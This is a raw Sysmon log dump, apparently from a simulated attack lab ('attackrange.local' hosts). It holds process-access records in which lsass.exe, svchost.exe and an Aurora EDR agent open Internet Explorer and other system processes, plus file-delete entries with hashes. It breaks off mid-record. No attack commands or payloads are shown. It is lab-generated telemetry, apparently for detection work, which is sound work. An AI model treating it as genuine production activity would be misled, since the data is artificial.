Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.141{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.141{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.079{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.079{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016526Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:14.475{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3B0F15F0D782A5F17EA3DD4BE83621D,SHA256=718CC3BDDABF1FD91CA9BD23EB7EDD123FB6F031065E1D4F745F09B7A95ADEBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.903{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=1C163DF40E1BB0608CC41D693E2F867B,SHA256=AE749D69808D50C7DC40DFF108A6D4B54407F270300901479F9B739C0185A6EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.884{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041995Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.871{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.857{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.840{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.822{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.801{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.786{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.775{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.772{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.769{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.260{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.258{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.131{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000041972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:14.131{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files 